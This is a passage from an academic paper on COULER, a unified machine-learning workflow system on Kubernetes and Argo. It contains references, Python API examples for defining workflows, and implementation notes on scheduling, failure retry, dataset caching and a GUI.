bug fixes and new features to not\nonly meet our internal requirements but benefit the community\nusers. Last but not least, we are grateful for the contributions\nfrom the C OULER open source community and their initial\npublic adoption and feedback that improves the project.\nREFERENCES\n[1] \u201cAdopters of couler,\u201d https://github.com/couler-proj/couler/blob/master/\nADOPTERS.md, Feb. 2024.\n[2] \u201cAirflow: a workflow management platform,\u201d https://airflow.apache.org/,\nOct. 2023.\n[3] \u201cAlipay: Optimizing alluxio for efficient large-scale\ntraining on billions of files,\u201d https://www.alluxio.io/blog/\noptimizing-alluxio-for-efficient-large-scale-training-on-billions-of-files/,\nFeb. 2024.\n[4] \u201cMachine learning model training with alluxio: Part\n1 solution overview,\u201d https://www.alluxio.io/blog/\nmachine-learning-training-with-alluxio-solution-overview/, Feb.\n2024.\n[5] \u201cArgo workflows,\u201d https://argoproj.github.io/argo-workflows/, Oct. 2023.\n[6] \u201cAuthoring and submitting argo work-\nflows using python,\u201d https://blog.argoproj.io/\nauthoring-and-submitting-argo-workflows-using-python-aff9a070d95f,\nFeb. 2024.\n[7] A. Chen, A. Chow, A. Davidson, A. DCunha, A. Ghodsi, S. A. Hong,\nA. Konwinski, C. Mewald, S. Murching, T. Nykodym, P. Ogilvie,\nM. Parkhe, A. Singh, F. Xie, M. Zaharia, R. Zang, J. Zheng, and\nC. Zumar, \u201cDevelopments in mlflow: A system to accelerate the machine\nlearning lifecycle,\u201d in mlflow , ser. DEEM\u201920. New York, NY , USA:\nAssociation for Computing Machinery, 2020.\n[8] H.-T. Cheng, Z. Haque, L. Hong, M. Ispir, C. Mewald, I. Polo-\nsukhin, G. Roumpos, D. Sculley, J. Smith, D. Soergel, Y . Tang et al. ,\n\u201cTensorflow estimators: Managing simplicity vs. flexibility in high-\nlevel machine learning frameworks,\u201d in Proceedings of the 23rd ACM\nSIGKDD International Conference on Knowledge Discovery and Data\nMining , 2017, pp. 1763\u20131771.\n[9] H.-T. Cheng, L. Koc, J. Harmsen, T. Shaked, T. Chandra, H. Aradhye,\nG. Anderson, G. Corrado, W. Chai, M. Ispir, R. Anil, Z. Haque, L. Hong,\nV . Jain, X. Liu, and H. Shah, \u201cWide & deep learning for recommender\nsystems,\u201d 2016.\n[10] S. W. Chien, A. Podobas, I. B. Peng, and S. Markidis, \u201ctf-darshan:\nUnderstanding fine-grained i/o performance in machine learning work-\nloads,\u201d in 2020 IEEE International Conference on Cluster Computing\n(CLUSTER) . IEEE, 2020, pp. 359\u2013370.\n[11] \u201cCodeflare,\u201d https://codeflare.readthedocs.io/en/latest/getting started/\noverview.html, Oct. 2023.\n[12] N. Erickson, J. Mueller, A. Shirkov, H. Zhang, P. Larroy, M. Li, and\nA. Smola, \u201cAutogluon-tabular: Robust and accurate automl for structured\ndata,\u201d arXiv preprint arXiv:2003.06505 , 2020.\n[13] M. Feurer, A. Klein, K. Eggensperger, J. Springenberg, M. Blum, and\nF. Hutter, \u201cEfficient and robust automated machine learning,\u201d Advances\nin neural information processing systems , vol. 28, 2015.\n[14] \u201cFlink,\u201d http://flink.apache.org/, Oct. 2023.\n[15] D. Gao, H. Wang, Y . Li, X. Sun, Y . Qian, B. Ding, and J. Zhou, \u201cText-\nto-sql empowered by large language models: A benchmark evaluation,\u201d\narXiv preprint arXiv:2308.15363 , 2023.\n[16] T. Gebru, J. Morgenstern, B. Vecchione, J. W. Vaughan, H. Wallach,\nH. D. Iii, and K. Crawford, \u201cDatasheets for datasets,\u201d Communications\nof the ACM , vol. 64, no. 12, pp. 86\u201392, 2021.\n[17] \u201cHadoop,\u201d http://hadoop.apache.org/, Oct. 2023.\n[18] F. Hutter, L. Kotthoff, and J. Vanschoren, Automated machine learning:\nmethods, systems, challenges . Springer Nature, 2019.\n[19] \u201cApache kafka,\u201d https://kafka.apache.org/, Oct. 2023.[20] A. B. Kahn, \u201cTopological sorting of large networks,\u201d Commun. ACM ,\nvol. 5, no. 11, p. 558562, Nov. 1962.\n[21] G. Ke, Q. Meng, T. Finley, T. Wang, W. Chen, W. Ma, Q. Ye, and\nT.-Y . Liu, \u201cLightgbm: A highly efficient gradient boosting decision\ntree,\u201d in Proceedings of the 31st International Conference on Neural\nInformation Processing Systems , ser. NIPS\u201917, Red Hook, NY , USA,\n2017, p. 31493157.\n[22] L. Kotthoff, C. Thornton, H. H. Hoos, F. Hutter, and K. Leyton-\nBrown, \u201cAuto-weka: Automatic model selection and hyperparameter\noptimization in weka,\u201d Automated machine learning: methods, systems,\nchallenges , pp. 81\u201395, 2019.\n[23] \u201cKubeflow,\u201d https://www.kubeflow.org/, Oct. 2023.\n[24] J. Lao, Y . Wang, Y . Li, J. Wang, Y . Zhang, Z. Cheng, W. Chen, M. Tang,\nand J. Wang, \u201cGptuner: A manual-reading database tuning system via\ngpt-guided bayesian optimization,\u201d arXiv preprint arXiv:2311.03157 ,\n2023.\n[25] H. Li, Alluxio: A virtual distributed file system . University of California,\nBerkeley, 2018.\n[26] M. Mitchell, S. Wu, A. Zaldivar, P. Barnes, L. Vasserman, B. Hutchin-\nson, E. Spitzer, I. D. Raji, and T. Gebru, \u201cModel cards for model\nreporting,\u201d in Proceedings of the conference on fairness, accountability,\nand transparency , 2019, pp. 220\u2013229.\n[27] A. N. Modi, C. Y . Koo, C. Y . Foo, C. Mewald, D. M. Baylor, E. Breck,\nH.-T. Cheng, J. Wilkiewicz, L. Koc, L. Lew, M. A. Zinkevich, M. Wicke,\nM. Ispir, N. Polyzotis, N. Fiedel, S. E. Haykal, S. Whang, S. Roy,\nS. Ramesh, V . Jain, X. Zhang, and Z. Haque, \u201cTfx: A tensorflow-based\nproduction-scale machine learning platform,\u201d in KDD 2017 , 2017.\n[28] P. Moritz, R. Nishihara, S. Wang, A. Tumanov, R. Liaw, E. Liang,\nM. Elibol, Z. Yang, W. Paul, M. I. Jordan et al. , \u201cRay: A distributed\nframework for emerging {AI}applications,\u201d in 13th USENIX Sympo-\nsium on Operating Systems Design and Implementation (OSDI 18) ,\n2018, pp. 561\u2013577.\n[29] \u201cNas,\u201d https://www.alibabacloud.com/product/nas, Oct. 2023.\n[30] E. Nijkamp, B. Pang, H. Hayashi, L. Tu, H. Wang, Y . Zhou, S. Savarese,\nand C. Xiong, \u201cCodegen: An open large language model for code with\nmulti-turn program synthesis,\u201d arXiv preprint arXiv:2203.13474 , 2022.\n[31] \u201cOdps,\u201d https://www.alibabacloud.com/help/product/27797.htm, Oct.\n2023.\n[32] \u201cApache ooize,\u201d https://oozie.apache.org/, Oct. 2023.\n[33] \u201cOss,\u201d https://www.alibabacloud.com/product/oss, Oct. 2023.\n[34] A. Paszke, S. Gross, F. Massa, A. Lerer, J. Bradbury, G. Chanan,\nT. Killeen, Z. Lin, N. Gimelshein, L. Antiga, A. Desmaison, A. Kopf,\nE. Yang, Z. DeVito, M. Raison, A. Tejani, S. Chilamkurthy, B. Steiner,\nL. Fang, J. Bai, and S. Chintala, \u201cPytorch: An imperative style, high-\nperformance deep learning library,\u201d in Advances in Neural Information\nProcessing Systems 32 , H. Wallach, H. Larochelle, A. Beygelzimer,\nF. d'Alch \u00b4e-Buc, E. Fox, and R. Garnett, Eds. Curran Associates, Inc.,\n2019, pp. 8024\u20138035.\n[35] N. Polyzotis, S. Roy, S. E. Whang, and M. Zinkevich, \u201cData lifecycle\nchallenges in production machine learning: A survey,\u201d SIGMOD Rec. ,\nvol. 47, no. 2, p. 1728, Dec. 2018.\n[36] S. Pumma, M. Si, W.-C. Feng, and P. Balaji, \u201cScalable deep learning via\ni/o analysis and optimization,\u201d ACM Transactions on Parallel Computing\n(TOPC) , vol. 6, no. 2, pp. 1\u201334, 2019.\n[37] N. Rajkumar, R. Li, and D. Bahdanau, \u201cEvaluating the text-to-sql\ncapabilities of large language models,\u201d arXiv preprint arXiv:2204.00498 ,\n2022.\n[38] D. K. Rensin, Kubernetes - Scheduling the Future at Cloud Scale . 1005\nGravenstein Highway North Sebastopol, CA 95472: k8s, 2015. [Online].\nAvailable: http://www.oreilly.com/webops-perf/free/kubernetes.csp\n[39] B. Sang, S. Gu, X. Zhan, M. Tang, J. Liu, X. Chen, J. Tan, H. Ge,\nK. Zhang, R. Ruan et al. , \u201cCougar: A general framework for jobs\noptimization in cloud,\u201d in 2023 IEEE 39th International Conference\non Data Engineering (ICDE) . IEEE, 2023, pp. 3417\u20133429.\n[40] S. Shrivastava, D. Patel, W. M. Gifford, S. Siegel, and J. Kalagnanam,\n\u201cThunderml: A toolkit for enabling ai/ml models on cloud for industry\n4.0,\u201d in International Conference on Web Services . Springer, 2019, pp.\n163\u2013180.\n[41] K. Shvachko, H. Kuang, S. Radia, and R. Chansler, \u201cThe hadoop\ndistributed file system,\u201d in 2010 IEEE 26th Symposium on Mass Storage\nSystems and Technologies (MSST) , 2010, pp. 1\u201310.\n[42] E. Sparks, S. Venkataraman, T. Kaftan, M. Franklin, and B. Recht,\n\u201cKeystoneml: Optimizing pipelines for large-scale advanced analytics,\u201d\ninkeystoneml , 04 2017, pp. 535\u2013546.[43] R. Sun, S. O. Arik, H. Nakhost, H. Dai, R. Sinha, P. Yin, and T. Pfister,\n\u201cSql-palm: Improved large language modeladaptation for text-to-sql,\u201d\narXiv preprint arXiv:2306.00739 , 2023.\n[44] \u201cTekton,\u201d https://tekton.dev/, Oct. 2023.\n[45] \u201ctf-darshan: Understanding fine-grained i/o performance in machine\nlearning workloads,\u201d https://www.osti.gov/biblio/1830501, Feb. 2024.\n[46] C. Thornton, F. Hutter, H. H. Hoos, and K. Leyton-Brown, \u201cAuto-weka:\nCombined selection and hyperparameter optimization of classification\nalgorithms,\u201d in Proceedings of the 19th ACM SIGKDD international\nconference on Knowledge discovery and data mining , 2013, pp. 847\u2013\n855.\n[47] K. Tian, E. Mitchell, A. Zhou, A. Sharma, R. Rafailov, H. Yao, C. Finn,\nand C. D. Manning, \u201cJust ask for calibration: Strategies for eliciting\ncalibrated confidence scores from language models fine-tuned with\nhuman feedback,\u201d arXiv preprint arXiv:2305.14975 , 2023.\n[48] A. Truong, A. Walters, J. Goodsitt, K. Hines, C. B. Bruss, and R. Farivar,\n\u201cTowards automated machine learning: Evaluation and comparison of\nautoml approaches and tools,\u201d in 2019 IEEE 31st international con-\nference on tools with artificial intelligence (ICTAI) . IEEE, 2019, pp.\n1471\u20131479.\n[49] Y . Wang, Y . Yang, W. Zhu, Y . Wu, X. Yan, Y . Liu, Y . Wang, L. Xie,\nZ. Gao, W. Zhu, X. Chen, W. Yan, M. Tang, and Y . Tang, \u201cSqlflow: A\nbridge between sql and machine learning,\u201d 2020.\n[50] J. Wei, X. Wang, D. Schuurmans, M. Bosma, F. Xia, E. Chi, Q. V . Le,\nD. Zhou et al. , \u201cChain-of-thought prompting elicits reasoning in large\nlanguage models,\u201d Advances in Neural Information Processing Systems ,\nvol. 35, pp. 24 824\u201324 837, 2022.\n[51] \u201cAwesome workflow engines,\u201d https://github.com/meirwah/\nawesome-workflow-engines, Oct. 2023.\n[52] \u201cXgboost,\u201d https://github.com/dmlc/xgboost, Oct. 2023.\n[53] D. Xin, H. Miao, A. Parameswaran, and N. Polyzotis, \u201cProduction\nmachine learning pipelines: Empirical analysis and optimization op-\nportunities,\u201d in Proceedings of the 2021 International Conference on\nManagement of Data , 2021, pp. 2639\u20132652.\n[54] F. F. Xu, U. Alon, G. Neubig, and V . J. Hellendoorn, \u201cA systematic\nevaluation of large language models of code,\u201d in Proceedings of the\n6th ACM SIGPLAN International Symposium on Machine Programming ,\n2022, pp. 1\u201310.\n[55] Z. Ye, D. Li, J. Tian, T. Lan, J. Zuo, L. Duan, H. Lu, Y . Jiang, J. Sha,\nK. Zhang et al. , \u201cAspen: High-throughput lora fine-tuning of large\nlanguage models with a single gpu,\u201d arXiv preprint arXiv:2312.02515 ,\n2023.\n[56] M. Zaharia, M. Chowdhury, T. Das, A. Dave, J. Ma, M. McCauly,\nM. J. Franklin, S. Shenker, and I. Stoica, \u201cResilient distributed datasets:\nA fault-tolerant abstraction for in-memory cluster computing,\u201d in 9th\nUSENIX Symposium on Networked Systems Design and Implementation\n(NSDI 12) . San Jose, CA: USENIX Association, Apr. 2012, pp. 15\u201328.\n[57] A. X. Zhang, M. Muller, and D. Wang, \u201cHow do data science workers\ncollaborate? roles, workflows, and tools,\u201d 2020.\n[58] S. Zhang, C. Gong, L. Wu, X. Liu, and M. Zhou, \u201cAutoml-gpt:\nAutomatic machine learning with gpt,\u201d arXiv preprint arXiv:2305.02499 ,\n2023.\n[59] L. Zimmer, M. Lindauer, and F. Hutter, \u201cAuto-pytorch: Multi-fidelity\nmetalearning for efficient and robust autodl,\u201d IEEE Transactions on\nPattern Analysis and Machine Intelligence , vol. 43, no. 9, pp. 3079\u2013\n3090, 2021.\nAPPENDIX A\nUNIFIED PROGRAMMING MODEL\nThis section provides an overview of the programming\nmodel to define a workflow. We at first introduce the pro-\ngramming interface, then show some examples for running\na workflow in a machine learning application. The major\ndesign rule of C OULER is aiming to help end-users to write\na workflow without the specific knowledge of the workflow\nengine itself. In this paper, we provide two ways to define\na workflow. One way is building a workflow implicitly (e.g.,\ncode 2 and code 3), the other way is explicitly defining a\nworkflow as code 4. The main difference is whether DAG is\ndescribed in the program. The core functions of C OULER arelisted in Table V, we would illustrate how to use C OULER to\nbuild a workflow based on the following examples. Because\nmost data scientists prefer to use Python, the programming\ninterface of C OULER is based on Python. However, this design\nis not limited to Python and could be extended to Java or\nanother language. At Ant Group, we also provided Java client\nfor end-users.\nName API Description\nRun script couler.run script () Run a script in a Pod\nRun container couler.run container () Start a container\nRun job couler.run job() Start a distributed job\nCondition couler.when () Condition definition\nMap couler.map () Start multiple instances for one job\nConcurrent couler.concurrent () Run multiple jobs at the same time\nRecursive couler.exec while () Run a function until a condition meets\nTABLE V: API Summary of C OULER\n1def producer(step_name):\n2 output_path = \"/opt/hello_world.txt\"\n3 output_place =\n4 couler.create_parameter_artifact(\n5 path=output_path, is_global=True\n6 )\n7 return couler.run_container(\n8 image=\"docker/whalesay:latest\",\n9 args=[\"echo -n hello world >\n10 %s\" % output_place.path],\n11 command=[\"bash\", \"-c\"],\n12 output=output_place,\n13 step_name=step_name,\n14 )\n15\n16def consumer(step_name, input):\n17 couler.run_container(\n18 image=\"docker/whalesay:latest\",\n19 command=[\"cowsay\"],\n20 step_name=step_name,\n21 )\n22\n23output = producer(\"step1\")\n24consumer(\"step2\", output)\nCode 2: Basic workflow and artifact definition in C OULER\nA. Basic workflow example and artifact\nA workflow is made by different steps, then each step is\nisolated from each other in the cloud base on the container.\nA container manages the complete the lifecycle of its host\nsystem, the contained environment helps each step to own the\nspecific computing requirement and resource. However, this\nbrings issues to pass data from one step to the following step\nin a workflow. In this work, we introduce the artifact to help\nusers to store the intermediate results inside a workflow.\nAn artifact is a by-product of workflow development and\ncreated. This might include things like data set, parameter,\nand diagram, etc. For example, a machine learning pipeline\ngenerates statistic results, trained models, or new features.\nFor different kinds of artifacts, users can register different\nphysical storage to place the related artifact based on specificName API Description\nParameter couler.create parameter artifact Create a parameter\nHDFS couler.create hd fs artifact Create a HDFS artifact\nAmazon S3 couler.create s3artifact Create a S3 artifact\nAlibaba OSS couler.create ossartifact Create a OSS artifact\nGoogle GCS couler.create gcsartifact Create a GCS artifact\nGit storage couler.create gitartifact Create a Git artifact\nTABLE VI: Artifact support in C OULER\nrequirements. Thus, we introduce multiple ways to store\nartifacts as Table VI.\nTake the code 2 as a running example, users register\na parameter artifact to pass data among two steps (e.g.,\na producer and consumer). Function producer ()generate\na message and pass the message to function consumer ()\nfrom line 1 to line 15. Each function is built based on\ncouler.run container (), where couler.run container ()is\nused to start a Pod in Kubernetes and run the corresponding\nfunction. As a result, two Pods start and run step by step in\nthe workflow as running a local python code lines 22 to 23.\nThen, the workflow engine propagates the related value among\nsteps without users\u2019 interaction. Note, Pods are the smallest\ndeployable units of computing that you can create and manage\nin Kubernetes.\nB. Control flow\n1def random_code():\n2 import random\n3\n4 res = \"heads\" if random.randint(0, 1)\n5 == 0\n6 else \"tails\"\n7 print(res)\n8\n9def flip_coin():\n10 return couler.run_script(\n11 image=\"python:alpine3.6\",\n12 source=random_code)\n13\n14def heads():\n15 return couler.run_container(\n16 image=\"alpine:3.6\",\n17 command=[\"sh\", \"-c\",\n18 \u2019echo \"it was headed\"\u2019]\n19 )\n20\n21def tails():\n22 return couler.run_container(\n23 image=\"alpine:3.6\",\n24 command=[\"sh\", \"-c\",\n25 \u2019echo \"it was tailed\"\u2019]\n26 )\n27\n28result = flip_coin()\n29couler.when(couler.equal(result, \"heads\"),\n30 lambda: heads())\n31couler.when(couler.equal(result, \"tails\"),\n32 lambda: tails())\nCode 3: Workflow control in C OULERControl flow is important for defining a workflow. For a\nmachine learning workflow, if a trained model fails to meet\nthe online serving criteria, the following step (e.g., model\ndeployment step) would not push the model to a server rather\nthan alerting user the model training failures.\nThis example code 3 combines the use of a Python function\nresult (e.g., Function random code()), along with condition-\nals, to take a dynamic path in the workflow. In this example,\ndepending on the result of the first step defined in flip coin\n(line 27) , the following step will either run the heads ()\nstep (line 28) or the tails()step (line 29). We can notice,\nsteps in C OULER can be defined via either Python functions\nor script to running for containers (e.g., line 9). In addition,\nthe conditional logic to decide whether to flip the coin in this\nexample is defined via the combined use of couler.when ()and\ncouler.equal (). As a result, users can control the workflow\nlogic based on the results of steps in the workflow dynamically.\nC. Define a workflow explicitly\n1def job(name):\n2 couler.run_container(\n3 image=\"docker/whalesay:latest\",\n4 command=[\"cowsay\"],\n5 args=[name],\n6 step_name=name,\n7 )\n8\n9# A\n10# / \\\n11# B C\n12# \\ /\n13# D\n14def diamond():\n15 couler.dag(\n16 [\n17 [lambda: job(name=\"A\")],\n18 [lambda: job(name=\"A\"),\n19 lambda: job(name=\"B\")], # A ->\nB\n20 [lambda: job(name=\"A\"),\n21 lambda: job(name=\"C\")], # A ->\nC\n22 [lambda: job(name=\"B\"),\n23 lambda: job(name=\"D\")], # B ->\nD\n24 [lambda: job(name=\"C\"),\n25 lambda: job(name=\"D\")], # C ->\nD\n26 ]\n27 )\n28diamond()\nCode 4: Workflow DAG in C OULER\nIn general, data scientists prefer to build a workflow implic-\nitly as the examples mentioned above. On other hand, data\nengineers want to organize a workflow explicitly. C OULER\nsupport end-users to build the dependency among steps based\non function setdependencies . Function setdependencies\ntake input as a function and let the user to define the\ndependencies steps of others based on the step name. Forexample, the code 4 generates a diamond workflow as line 15.\nIn this way, users need to own a clear big picture for the\nworkflow, and under how the running logic among steps in\ntheir real application. At Ant Group, we analyze the users\u2019\npreference to choose to build a workflow and we found major\nof data scientists choose to define a workflow implicitly, yet,\ndata engineers incline to build a workflow explicitly since\nthey facing more than one hundred steps in a workflow.\nThe definition of DAG workflow via explicit way helps data\nengineer to debug a failed workflow more easily, and build a\ncomplicated workflow with hundred nodes.\nD. Example: running recursive in a workflow\nCOULER provide a straightforward way to help end users\nto define the recursive logic in a workflow. For machine\nlearning workflow, data scientists need to search a machine\nlearning model until the model meets the specific requirement\n(e.g., model precision, convergence ratio, or the number of\niteration steps is bigger than predefined value). Thus, data\nscientist hope to search the best ML model in a workflow\nrecursively. Example 5 demonstrates how to run the recursive\nin a workflow. This flip coin()step is running recursively\nuntil the output is equal a tails (line 14 to 15).\n1def random_code():\n2 import random\n3\n4 result = \"heads\" if random.randint(0, 1)\n5 == 0 else \"tails\"\n6 print(result)\n7\n8\n9def flip_coin():\n10 return couler.run_script(\n11 image=\"alpine3.6\",\n12 source=random_code)\n13\n14# Stop flipping coin until the outputs of\n15 \u2019flip_coin\u2019 is not \u2019tails\u2019\n16couler.exec_while(couler.equal(\"tails\"),\n17 lambda: flip_coin())\nCode 5: Recursive in C OULER\nE. Example: select a best ML model\n1def train_tensorflow(batch_size):\n2 import couler.steps.tensorflow as tf\n3\n4 return tf.train(\n5 num_ps=1,\n6 num_workers=1,\n7 command=\"python /train_model.py\",\n8 image=\"wide-deep-model:v1.0\",\n9 input_batch_size=batch_size,\n10 )\n11\n12\n13def run_multiple_jobs(num_jobs):\n14 para = []\n15 i = 0\n16 batch_size = 017 while i < num_jobs:\n18 batch_size += 100\n19 para.append(batch_size)\n20 i = i + 1\n21\n22 return couler.map(lambda x:\n23 train_tensorflow(x), para)\n24\n25def evaluation(model_path):\n26 return couler.run_container(\n27 image=\"model_evalutation:v1\",\n28 command=[\"python model_eval.py\"],\n29 args=[model_path],\n30 step_name=\"eval\",\n31 )\n32\n33model_path = run_multiple_jobs(5)\n34couler.map(lambda x: evaluation(x),\n35 model_path)\nCode 6: Searching a best ML model in C OULER\nThe hyper-parameters of machine learning modes such as\nbatch size or converge ratio decide the performance of the\nmodel. Data scientists need to run multiple jobs in one same\nworkflow to find the best model based on the same input data.\nThe sample program 6 implements a model searching\nprocedure for a deep learning model (e.g., wide and deep\nmodel [9]. This is a common recommendation algorithm that\nrecommends items to users based on users\u2019 profiles and user-\nitem interaction. We start by defining a training job via the\nstep zoo of C OULER , this job train a DL model based on the\ndifferent batch size from line 1 to 10, then run map function to\nstart multiple TensorFlow jobs in the same workflow from line\n13 to 33. Next, multiple evaluation steps are running based on\nthe outputs of previous model training results from line 25 to\n31.\nF . Example: Running an AutoML pipeline\n1def train_xgboost():\n2 train_data = Dataset(\n3 table_name=\"pai_telco_demo_data\",\n4 feature_cols=\"tenure,age,\n5 marital,address,ed,employ\",\n6 label_col=\"churn\",\n7 )\n8\n9 model_params = {\"objective\":\n10 \"binary:logistic\"}\n11 train_params = {\"num_boost_round\": 10,\n12 \"max_depth\": 5}\n13\n14 return xgboost.train(\n15 datasource=train_data,\n16 model_params=model_params,\n17 train_params=train_params,\n18 image=\"xgboost-image\",\n19 )\n20\n21def train_lgbm():\n22 train_data = Dataset(\n23 table_name=\"pai_telco_demo_data\",\n24 feature_cols=\"tenure,age,25 marital,address,ed,employ\",\n26 label_col=\"churn\",\n27 )\n28\n29 lgb = LightGBMEstimator()\n30 lgb.set_hyperparameters(num_leaves=63,\n31 num_iterations=200)\n32 lgb.model_path = \"lightgbm_model\"\n33 return lgb.fit(train_data)\n34\n35couler.concurrent([lambda: train_xgboost(),\n36 lambda: train_lgbm()])\nCode 7: An AutoML workflow in C OULER\nA more complex machine learning workflow application\nis the AutoML. Different from hyper-parameter tuning, data\nscientist prefers to select the best models from multiple model\ncandidates based on the same input data. This program 7\nshows how to choose a best model from two machine learning\nmodel (e.g., XGBoost [52] and LightGBM [21]), which are\nthe state-of-art tree and boost based machine learning model.\nThe training model in train xgboost ()andtrain lightbm ()\nis defined based on user\u2019s from line 1 to line 33, then\ncouler.concurrent ()will run two jobs parallel in the same\nworkflow. Different from the way of couler.map (), Function\ncouler.concurrent ()start two training process based on dif-\nferent machine learning model.\nAPPENDIX B\nIMPLEMENTATION\nThe Python SDK for C OULER is now open-source, as\nshown in its public repository\u2020. Several top enterprises have\nintegrated this SDK into their production environments. The\nwhole C OULER service is crafted in Golang, encompassing\nall internal components. Initially, the service might remain\nproprietary due to user onboarding challenges, but enhancing\nand ensuring the reusability of the optimization components\nis our priority. Thus, we are developing these components as\ncore libraries. Consequently, the service operates as a gRPC\nservice atop these libraries. In its open-source form, the Python\nSDK can utilize these libraries for extended capabilities.\nIt\u2019s worth mentioning that C OULER is extensively used by\nAnt Group, managing over 20,000 workflows and 250,000\npods daily. Insights from our deployment experiences with the\nworkflow engine are discussed in subsequent sections.\nBeyond AntGroup, COULER is being used by a diverse\nset of organizations, as indicated in the list of adopters\navailable on Adopters of Couler [1]. These adopters span\ndifferent industries and use cases, suggesting that COULER is\nflexible and adaptable to various requirements and scenarios.\nMoreover, Argo\u2019s endorsement of Couler [6] further supports\nCOULER\u2019s suitability for different workloads and platforms.\nA. Workflow scheduling among clusters\nAt Ant Group, we have more than one clusters in differ-\nent locations. Workflows are scheduled among those clusters\n\u2020https://couler-proj.github.io/couler/and each cluster has its specific configuration. For example,\nCluster A is specifically designed for GPU jobs, Cluster B is\nlocated far away from the storage cluster, Cluster C provides\nmore CPU capacity than others. In addition, the storage and\ncomputation capacity of a cluster is changing with respect the\ntime. We need to make sure each cluster owns the similar\ncomputation load. In this work, we provide a workflow queue\nto schedule the related steps of workflow into a corresponding\ncluster based on the following properties: (a) the workflow\npriority based on business logic, (b) cluster current capacity\nof CPU/Memory, (c) user\u2019s current CPU/Memory quota, (d)\nuser\u2019s current GPU quota. Then, a job is queued and pull out\nfrom the queue based on the weight combination of mentioned\nfactors. In this way, we can guarantee each cluster shares a\nsimilar capacity and avoid one cluster being overflow in the\nproduction.\nB. Monitor and failure handler\nIn order to reduce the unnecessary failure of workflow\nbelonging to the system environment (i.e., abnormal patterns\nof cloud), we adopt following polices to improve the stability:\n(a) workflow on-time monitor, (b) workflow controller auto\nretry, (c) provide options for users to restart from failure.\nInitially, we monitor workflow status and track the health\nstatus of the workflow engine. For example, we record the\nnumber of workflows based on their status, the latency for the\nworkflow operator to process a workflow, etc. This monitor\nmetric helps the SRE to respond to the abnormal behaviors of\nthe workflow at the first time.\nSubsequently, we get the patterns of system errors related\nworkflow. For example, \u201cExceededQuotaErr\u201d means the Etcd\nof Kubernetes exceeded quota during the system is updat-\ning. \u201cTooManyRequestsErr\u201d means too many requests being\nhandled by API-server, usually happens under high pressure.\nThe backoff limit retry policy would help avoid DDOS of the\ncluster Etcd server. In general, we have found more than 20\nabnormal patterns to retry, then the workflow controller restarts\nthe failed step inside a workflow rather than from the begging\nautomatically.\nFurthermore, there are instances where users prefer to\nmanually retry some failed workflows, a scenario frequently\nencountered in machine learning. In such cases, data scientists\nupdate the relevant steps and wish to retry the workflow\nfrom the failure point instead of from the beginning. To\naddress this type of failure, C OULER \u2019s server first retrieves\nthe failed workflow from the database. Note that we persist\nworkflow metadata into a database for automated manage-\nment. The server then processes the failed workflow, skipping\nthe steps with \u201cSucceeded,\u201d \u201cSkipped,\u201d or \u201cCached\u201d status.\nSubsequently, the server deletes the failed steps and the\nrelated CRDs and marks these steps as running. Finally, the\nworkflow\u2019s status is updated to running, and it is restarted from\nthe failed step by the workflow operator.C. Caching input data for machine learning workflow\nIn a machine learning workflow, the input data for model\ntraining is stored in a data storage cluster, while the ma-\nchine learning job runs in a separate computation cluster.\nThis necessitates fetching data from remote storage before\ntraining, which is time-consuming and can lead to network IO\nfailures. This is particularly problematic for applications like\nads recommendation, where input tables often exceed 1TB,\nand for image and video deep learning models, which usually\ninvolve over a million files.\nAn analysis of production machine learning workflows at\nAnt Group, which include more than 5k models and 10k\nworkflows for applications such as ads recommendation, fault\ndetection, and video and image analysis, revealed that most\nworkflows read the same data multiple times. For instance,\n70% and 85% of the input data for tables and files, respec-\ntively, was read repeatedly. This redundancy arises due to\nseveral factors: (1) a single training job may need to scan\nthe entire dataset multiple epochs, (2) multiple training jobs\nmay need to read the same data to train the basic model, and\n(3) different training jobs may read overlapping data partitions\nusing a sliding time window.\nCurrently, users read input data via Python/Java clients\nin the Kubernetes pods of machine learning training jobs.\nHowever, the workflow engine, such as Argo Workflows,\ncannot track data flow because it operates on Kubernetes\nCustom Resource Definitions (CRD) and does not monitor\nthe runtime information of pods. This leads to two issues: (1)\nif a workflow fails, the training job must read the input data\nagain, and (2) if multiple training jobs in the same workflow\nread the same input data, each job reads the data remotely,\nleading to redundant data access and high network IO.\nTo address these issues, we propose a new Kubernetes CRD,\ncalled Dataset , to represent the input and output data of a\njob. The schema of Dataset is shown in Code 8. This CRD\nrecords the metadata of the data, enabling the workflow engine\nto understand the input and output of a training job and skip\nsteps to read cached data. Additionally, a caching server reads\ntheDataset status and syncs the data from the storage cluster\nto the computation cluster, eliminating the need for multiple\ndata synchronizations for different jobs.\n1apiVersion:\nio.kubemaker.alipay.com/v1alpha1\n2kind: Dataset\n3metadata:\n4 name: couler-cache-dataset\n5spec:\n6 owner: user_id\n7 odps:\n8 accessID:\n9 secretKeyRef:\n10 name: test-dataset-secret\n11 key: aid\n12 accessKey:\n13 secretKeyRef:\n14 name: test-dataset-secret\n15 key: akey16 project: test_project\n17 table: test_table\nCode 8: Dataset CRD in C OULER\nD. Interactive GUI\nIn addition to the programming API for defining workflows,\nwe also offer a GUI interface within a web portal. With\nthis approach, users can create workflows without any pro-\ngramming experience. Let\u2019s consider Figure 9 as an example.\nUsers aim to identify the best model for predicting user\nchurn. Data scientists initially define data splitting methods\nfor training, select various well-known models (e.g., logistic\nregression, random forest, and XGBoost) for training the\nsame data, and ultimately choose the best model based on\nevaluation results. End-users only need to configure model-\nrelated parameters or data splitting methods. The backend then\ntranslates these actions into the workflow\u2019s IR, as explained in\nSection II, which is subsequently sent to the server for further\noptimization.\nMeanwhile, machine learning algorithm developers can\nconstruct their own models and share them with others on\nthe same platform. This collection of well-known machine\nlearning algorithms is referred to as the \u201dmodel zoo.\u201d A model\nzoo comprises model definitions and trained model parameters,\nessential for using the model in predictions and other analytical\ntasks. Notably, the backend of the model zoo corresponds to\nthe \u201dstep zoo\u201d of C OULER , as each model runs as one step in\na workflow. Therefore, the GUI and related actions align with\nCOULER \u2019s programming. Leveraging the interactive GUI, a\nsignificant portion of workflows (e.g., over 60%) in the cluster\nare executed via the GUI, addressing the rapid development\nneeds of machine learning applications.\nE. SQL and SQLFlow\nIn addition to the GUI and Python programming interface,\nSQLFlow [49] offers an SQL-like language to train machine\nlearning models and employ the trained models for predictions.\nCOULER serves as the default backend for SQLFlow [49].\nAll optimizations discussed in this work aim to enhance\nSQLFlow\u2019s model training speed. Typically, a SQLFlow SQL\nstatement is converted into Couler programming code, which\nthen initiates a workflow in Kubernetes. An example can be\nseen in code B-E, where a DNNClassifier model is trained\nusing TensorFlow Estimators [8] on the sample data, Iris.train.\n1SELECT *\n2FROM iris.train\n3TO TRAIN DNNClassifier\n4WITH model.n_classes = 3,\n5model.hidden_units = 